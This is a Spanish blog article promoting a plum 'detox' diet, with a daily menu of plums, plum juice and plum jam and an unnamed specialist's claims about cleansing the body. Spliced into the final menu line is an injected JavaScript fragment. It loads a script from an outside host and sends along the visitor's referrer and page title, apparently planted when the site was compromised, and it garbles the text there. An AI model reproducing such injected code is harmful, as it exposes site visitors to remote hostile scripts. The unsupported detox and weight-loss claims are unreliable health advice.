Salud y belleza » Dieta

La ciruela, esa gran herramienta depurativa

Sin Comentarios

Nota importante: leer este artículo y carecer de cualquier tipo de amor hacia las ciruelas resulta tan inútil como, también observar este análisis, sin las fuerzas suficientes como para comenzar una dieta. Pero digamos lo mismo, en modo inverso: si te gustan las ciruelas y estás buscando una buena dieta pues, bien, este articulo es la panacea.

Pero, ¿por qué una dieta a base de ciruelas como sistema desintoxicante? Vayamos, derecho, sin escalas, hacia una mirada profesional: “la ciruela, como otro reducido grupo de frutas, puede funcionar perfectamente en un nivel depurativo. Es decir, realizar una dieta a base de ese elemento natural no solo sirve para bajar de peso sino, además, para mantener el organismo limpio. Una ciruela contiene 80% de agua, fibras y casi nada de calorías. El consumo de ciruelas es ideal para desinflamar el abdomen y restaurar el estomago tras alguna jornada de alimentos en exceso” asegura un especialista.

Dieta desintoxicante a base de ciruelas, ejemplo de menú diario:

Por la mañana: una infusión a elección (sin azúcar, con edulcorante), dos tostadas de pan de salvado untado con mermelada de ciruelas.

A media mañana: un vaso de zumo de ciruelas.

En el almuerzo: trescientos gramos de ciruelas frescas.

Como primera colación: un vaso de zumo de ciruelas frescas.

Por lo tarde: una infusión a elección (sin azúcar) y un par de tostadas de pan integral untadas con mermelada de ciruelas.

A la noche: doscientos gramos de ciruelas.

Como segunda colación: una taza de té de boldo o manzanilla.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.